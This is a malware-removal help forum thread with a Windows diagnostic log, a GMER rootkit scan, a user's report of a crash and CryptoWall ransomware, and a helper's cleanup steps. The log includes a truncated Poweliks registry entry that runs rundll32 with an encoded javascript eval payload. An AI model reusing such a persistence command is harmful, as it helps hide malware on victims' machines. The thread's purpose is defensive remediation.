TeamSpeak 3 Client (HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\TeamSpeak 3 Client) (Version: 3.0.15 - TeamSpeak Systems GmbH)
Teleglitch: Die More Edition (HKLM-x32\...\Steam App 234390) (Version:  - Test3 Projects)
Terraria (HKLM-x32\...\Steam App 105600) (Version:  - Re-Logic)
The Binding of Isaac (HKLM-x32\...\Steam App 113200) (Version:  - Edmund McMillen and Florian Himsl)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version:  - Nicalis, Inc.)
The Escapists (HKLM-x32\...\Steam App 298630) (Version:  - Mouldy Toof Studios)
The Secret of Monkey Island: Special Edition (HKLM-x32\...\Steam App 32360) (Version:  - LucasArts)
The Talos Principle Public Test (HKLM-x32\...\Steam App 330710) (Version:  - Croteam)
TightVNC 2.0.2 (HKLM-x32\...\TightVNC) (Version: 2.0.2 - GlavSoft LLC.)
Unity Web Player (HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Uplay (HKLM-x32\...\Uplay) (Version: 2.0 - Ubisoft)
Valiant Hearts: The Great War™ / Soldats Inconnus : Mémoires de la Grande Guerre™ (HKLM-x32\...\Steam App 260230) (Version:  - Ubisoft Montpellier)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
World of Goo (HKLM-x32\...\Steam App 22000) (Version:  - 2D BOY)
Ziggurat (HKLM-x32\...\Steam App 308420) (Version:  - Milkstone Studios)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2217723503-548262416-3983414958-1007_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
10-11-2014 00:40:03 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:34 - 2012-08-14 09:13 - 00000968 ____A C:\Windows\system32\Drivers\etc\hosts
10.100.5.252 bmtex2010
172.20.16.155 grfdfs
10.100.5.50 stl2k3ns1
10.100.5.51 stl2k3ns2
10.100.5.52 stl2k3dc1
10.100.5.53 stl2k3dc2
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {2F324146-BA28-46F8-A8E2-C8E487EF7EBB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)
Task: {482D745E-ECAD-4DD7-ABB2-87622D2AD612} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {5447ECDB-2C78-401D-BFAE-F7C6E6F830AF} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2014-10-22] (Overwolf LTD)
Task: {A9237A40-FCB0-40E2-B712-4D310799122D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {AA3A2AC5-53FF-4D70-B6F1-39A55FA7BA06} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {AAFD7EB2-F0DF-4E39-8C89-8F15B716ED81} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {B3E7C114-D31F-402A-9253-A4FB8DCB1E3B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)
Task: {DF3E1F4C-B60E-4DFD-93A5-91A4BD728439} - System32\Tasks\{44A1741A-3325-5E3D-3774-F73A5D212500} => C:\Users\Calahan\AppData\Roaming\BMMCegjc\BfVFqtQW\sSmQiMZV\HDDIaJDbA.exe <==== ATTENTION
Task: {E9004E9C-6652-4A05-ABDD-0AE18E65854F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {EF3C8A0C-24A9-4BAE-9739-B91FE7A27393} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-02-28 17:18 - 2014-02-28 17:18 - 00075136 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:23 - 2010-10-20 14:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2010-01-02 09:42 - 2010-01-02 09:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2009-11-24 18:36 - 2009-11-24 18:36 - 00125440 _____ () C:\Program Files (x86)\Notepad++\NppShell_01.dll
2014-06-27 17:44 - 2011-12-01 14:15 - 00777448 ____N () C:\Program Files\Plantronics\GameCom780\GameCom780.exe
2012-09-13 00:38 - 2012-09-13 00:38 - 00264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2014-11-10 21:15 - 2014-11-10 21:16 - 00380416 _____ () C:\Users\Calahan\Downloads\nffvqpeh.exe
2014-06-27 17:44 - 2011-12-01 14:16 - 00150760 ____N () C:\Program Files\Plantronics\GameCom780\VmixPLGC.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 02144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 07955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2012-09-13 00:39 - 2012-09-13 00:39 - 00336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:45 - 2010-10-20 14:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2011-11-08 15:46 - 2011-11-08 15:46 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
2014-10-29 11:26 - 2014-10-21 23:05 - 14902600 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-2217723503-548262416-3983414958-500 - Administrator - Disabled) => C:\Users\Administrator.cvci20462
Calahan (S-1-5-21-2217723503-548262416-3983414958-1007 - Administrator - Enabled) => C:\Users\Calahan
Elisa (S-1-5-21-2217723503-548262416-3983414958-1006 - Limited - Enabled) => C:\Users\Elisa
Guest (S-1-5-21-2217723503-548262416-3983414958-501 - Limited - Enabled) => C:\Users\Guest
HomeGroupUser$ (S-1-5-21-2217723503-548262416-3983414958-1003 - Limited - Enabled)
Logan (S-1-5-21-2217723503-548262416-3983414958-1005 - Administrator - Enabled) => C:\Users\Logan
Mike2 (S-1-5-21-2217723503-548262416-3983414958-1004 - Administrator - Enabled) => C:\Users\Mike2
 
==================== Faulty Device Manager Devices =============
 
Name: PS/2 Compatible Mouse
Description: PS/2 Compatible Mouse
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)
Description: Product: Adobe Reader XI - Update '{AC76BA86-7AD7-0000-2550-7A8C40011009}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: accrdsub.exe, version: 6.2.1.52, time stamp: 0x4a266469
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521eaf24
Exception code: 0xc0000005
Fault offset: 0x0000000000052eef
Faulting process id: 0x838
Faulting application start time: 0xaccrdsub.exe0
Faulting application path: accrdsub.exe1
Faulting module path: accrdsub.exe2
Report Id: accrdsub.exe3
 
Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x08356020
Faulting process id: 0x4bc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0840e020
Faulting process id: 0x2e2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 9.0.8112.16584 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 2074
 
Start Time: 01cffc98a2a67803
 
Termination Time: 10
 
Application Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
 
Report Id: e82a2d01-688b-11e4-a553-6c626d9e55b8
 
Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x541caffd
Faulting module name: WININET.dll, version: 9.0.8112.16584, time stamp: 0x541cb050
Exception code: 0xc0000005
Fault offset: 0x000d4825
Faulting process id: 0x3230
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50ed
Faulting module name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50ed
Exception code: 0xc0000005
Fault offset: 0x004232b5
Faulting process id: 0x2c4c
Faulting application start time: 0xFalloutNV.exe0
Faulting application path: FalloutNV.exe1
Faulting module path: FalloutNV.exe2
Report Id: FalloutNV.exe3
 
Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 38.0.2125.111, time stamp: 0x5447163b
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7
Exception code: 0xc0000374
Fault offset: 0x000ce753
Faulting process id: 0xc10
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
 
Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp
 
Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp
 
 
System errors:
=============
Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
 
Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
 
Error: (11/10/2014 08:22:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The HP Health Check Service service failed to start due to the following error: 
%%2
 
Error: (11/10/2014 08:21:45 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/10/2014 08:18:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DameWare Mini Remote Control service failed to start due to the following error: 
%%3
 
Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
%%1068
 
Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
%%1068
 
Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
%%1068
 
Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
%%1068
 
Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
%%1068
 
 
Microsoft Office Sessions:
=========================
Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)
Description: Adobe Reader XI{AC76BA86-7AD7-0000-2550-7A8C40011009}1625(NULL)(NULL)(NULL)
 
Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: accrdsub.exe6.2.1.524a266469ntdll.dll6.1.7601.18247521eaf24c00000050000000000052eef83801cff7cbaa298beaC:\Program Files\ActivIdentity\ActivClient\accrdsub.exeC:\Windows\SYSTEM32\ntdll.dllb5425d6b-6934-11e4-a553-6c626d9e55b8
 
Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c0000005083560204bc01cffc99acb61f44C:\Program Files\Internet Explorer\iexplore.exeunknown07177948-688d-11e4-a553-6c626d9e55b8
 
Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c00000050840e0202e2c01cffc99acb58302C:\Program Files\Internet Explorer\iexplore.exeunknown0717a058-688d-11e4-a553-6c626d9e55b8
 
Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe9.0.8112.16584207401cffc98a2a6780310C:\Program Files (x86)\Internet Explorer\iexplore.exee82a2d01-688b-11e4-a553-6c626d9e55b8
 
Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.16584541caffdWININET.dll9.0.8112.16584541cb050c0000005000d4825323001cffc98a390db72C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\syswow64\WININET.dlle64fc0be-688b-11e4-a553-6c626d9e55b8
 
Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: FalloutNV.exe1.4.0.5254e0d50edFalloutNV.exe1.4.0.5254e0d50edc0000005004232b52c4c01cffb75dc2e1c3cC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exeC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exe2309037f-67b2-11e4-a553-6c626d9e55b8
 
Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: chrome.exe38.0.2125.1115447163bntdll.dll6.1.7601.18247521ea8e7c0000374000ce753c1001cffb1f87a3d830C:\Program Files (x86)\Google\Chrome\Application\chrome.exeC:\Windows\SysWOW64\ntdll.dll9d5c5460-6713-11e4-a553-6c626d9e55b8
 
Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp
 
Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp
 
 
CodeIntegrity Errors:
===================================
  Date: 2011-12-05 22:19:14.852
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-05 22:10:09.618
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-05 22:03:00.342
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-05 21:51:41.439
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-05 21:41:31.323
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-01 21:31:57.630
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-01 19:53:29.363
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-01 18:55:19.639
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-11-30 20:37:01.322
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-11-30 20:22:56.207
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core i5 CPU 750 @ 2.67GHz
Percentage of memory in use: 43%
Total physical RAM: 4031.29 MB
Available physical RAM: 2292.86 MB
Total Pagefile: 8060.76 MB
Available Pagefile: 5054.2 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB
 
==================== Drives ================================
 
Drive c: (Hard Drive) (Fixed) (Total:289.83 GB) (Free:29.36 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:6.25 GB) (Free:0.77 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive f: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive g: () (Fixed) (Total:232.68 GB) (Free:9.99 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 6233878F)
Partition 1: (Active) - (Size=2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=289.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=6.2 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 232.8 GB) (Disk ID: 08000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=232.7 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================

 

Link to post
Share on other sites

Well, I have the GMER .txt, but once the scan finished, everything went to Hell in a grenade basket. Malwarebytes real-time protection stopped working, and I couldn't fix it. Then I realised there was a litany of processes running that were rather hoodlum looking. Ended the good ol' dllhost.exe process, and my computer decided to commit seppuku and blue screened. Was rather terrifying. Here's the GMER .txt. By the way, someone missed a purely amazing opportunity to name a program that is used to fight computer virus GERM. Would have been brilliant.

 

Blue Screen/Crash stuff.

Problem signature:
  Problem Event Name: BlueScreen
  OS Version: 6.1.7601.2.1.0.256.48
  Locale ID: 1033
 
Additional information about the problem:
  BCCode: 1000007e
  BCP1: FFFFFFFFC0000005
  BCP2: FFFFF80002FBBA9B
  BCP3: FFFFF880033AF7F8
  BCP4: FFFFF880033AF050
  OS Version: 6_1_7601
  Service Pack: 1_0
  Product: 256_1
 
Files that help describe the problem:
  C:\Windows\Minidump\111114-83413-01.dmp
  C:\Users\Calahan\AppData\Local\Temp\WER-94957-0.sysdata.xml
 
Read our privacy statement online:
 
If the online privacy statement is not available, please read our privacy statement offline:
  C:\Windows\system32\en-US\erofflps.txt
 

 

 

GMER

 

GMER 2.1.19357 - http://www.gmer.net
Rootkit scan 2014-11-10 23:56:23
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 WDC_WD32 rev.03.0 298.09GB
Running: nffvqpeh.exe; Driver: C:\Users\Calahan\AppData\Local\Temp\uxryipod.sys
 
 
---- Threads - GMER 2.1 ----
 
Thread  C:\Windows\System32\svchost.exe [412:3808]                                  000007fee4453efc
Thread  C:\Windows\System32\svchost.exe [412:2376]                                  000007fee44f8a4c
Thread  C:\Windows\system32\svchost.exe [740:6560]                                  000007fefc781ab0
Thread  C:\Windows\system32\svchost.exe [740:13108]                                 000007fefc7a4164
Thread  C:\Windows\system32\svchost.exe [1136:2820]                                 000007fee488d3c8
Thread  C:\Windows\system32\svchost.exe [1136:3032]                                 000007fee488d3c8
Thread  C:\Windows\system32\svchost.exe [1136:880]                                  000007fee488d3c8
Thread  C:\Windows\system32\svchost.exe [1136:3424]                                 000007fee488d3c8
Thread  C:\Windows\System32\spoolsv.exe [1616:2504]                                 000007fef7f010c8
Thread  C:\Windows\System32\spoolsv.exe [1616:2508]                                 000007fef7e86144
Thread  C:\Windows\System32\spoolsv.exe [1616:2512]                                 000007fef8775fd0
Thread  C:\Windows\System32\spoolsv.exe [1616:2516]                                 000007fef7e63438
Thread  C:\Windows\System32\spoolsv.exe [1616:2520]                                 000007fef87763ec
Thread  C:\Windows\System32\spoolsv.exe [1616:2528]                                 000007fef9135e5c
Thread  C:\Windows\System32\spoolsv.exe [1616:2952]                                 000007fef91e5074
Thread  C:\Windows\System32\spoolsv.exe [1616:2124]                                 000007fef9252288
Thread  C:\Windows\System32\spoolsv.exe [1616:3116]                                 000007fef7f58760
Thread  C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [1720:2452]  000007fef7d94094
Thread  C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [1720:1320]  000007fef7d94094
Thread  C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [1720:2624]  000007fef421c680
 
---- EOF - GMER 2.1 ----
Link to post
Share on other sites

Welp, I had my computer running in Safe-Mode, trying to keep tabs on if someone responded yet to this thread, and Internet Explorer reared up and was telling me my files were being encrypted. Obvious ransomware. Came outa nowhere. That computer is now off. It was in the vain of Crypto. Can't quite remember what. Read something quickly about RSA and powered my computer down. Not even Safe-Mode is safe.

Link to post
Share on other sites

These steps are for  Vitharr only. If you are a casual viewer, do NOT try this on your system!
If you are not  and have a similar problem, do NOT post here;  start your own topic

 

 

:welcome:    Hello Vitharr.

 

Your system is a victim of the Poweliks malware.  Please just make sure to only just "attach" reports as we go forward.  Do not copy and paste in-line.

 

Do not run or start any other programs while these utilities and tools are in use!
Do NOT run any other tools on your own or do any fixes other than what is listed here.
If you have questions, please ask before you do something on your own.
 
Close any of your open programs while you run these tools.

IF and only if you have any previous copy of our anti-rootkit tool,  "mbar.exe"  ..... then delete it now.


Please download Malwarebytes Anti-Rootkit (MBAR)  and save it to your desktop,
from here   
http://downloads.malwarebytes.org/file/mbar

•Be sure to print out ( if possible) and follow the instructions provided on that same page.

•Doubleclick on the MBAR-1.0.8.1.1001.exe file you downloaded and approve the UAC prompt in Vista and newer operating systems.

 

•Click **OK** on the next screen, to allow the package to extract the contents of the file to its own folder, mbar.

 

mbar.exe will launch automatically. On some systems, this may take a few extra seconds. Please be patient and wait for the program to open.
•After reading the Introduction, click '**Next**' if you agree.

 

•On the Update Database screen, click on the '**Update**' button.
•Once you see 'Success: Database was successfully updated' click on 'Next'.
•Click the '**Scan**' button.

With some infections, you may see two messages boxes.
  1.'Could not load protection driver'. Click 'OK'.
  2.'Could not load DDA driver'. Click 'Yes' to this message, to allow the driver to load after a restart. Allow the computer to restart. Continue with the rest of these instructions.
 

 

When the Scan has completed, click the '**CleanUp**' button and allow the reboot if prompted.

Perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain.
 

 

Then, please send the following logs as attachments to your reply. These logs are located in the mbar folder on your desktop where the tool extracted itself to.

**mbar-log-2014-11-14  (xx-xx-xx).txt** (where xx-xx(xx-xx-xx) is the date and time of the scan)
+ also
**system-log.txt**

I need to have both of those files attached in your next reply.  Thanks.  **Send even if nothing is reported as detected. Always send these.**

Link to post
Share on other sites

This pc had multiple malwares, including a cryptowall ransomware.   Were you aware of the latter?

 

DECRYPT_INSTRUCTION.HTML (CryptoWall.Trace) -> Delete on reboot. [1500f448f38951e533e864dedd26718f]
C:\Users\Calahan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT_INSTRUCTION.TXT (CryptoWall.Trace) -> Delete on reboot. [b164f547cbb11d1936e5e85a41c236ca]
C:\Users\Calahan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT_INSTRUCTION.URL (CryptoWall.Trace

 

To  empty  out temporary file areas, do this:

Download TFC by OldTimer to your desktop

  • Please double-click TFC.exe to run it. (Note: If you are running on Vista or Windows 7, right-click on the file and choose Run As Administrator).
  • It will close all programs when run, so make sure you have saved all your work before you begin.
  • Click the Start button to begin the process. Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.  Let it run uninterrupted to completion.
  • IF prompted to Reboot, reply "Yes".

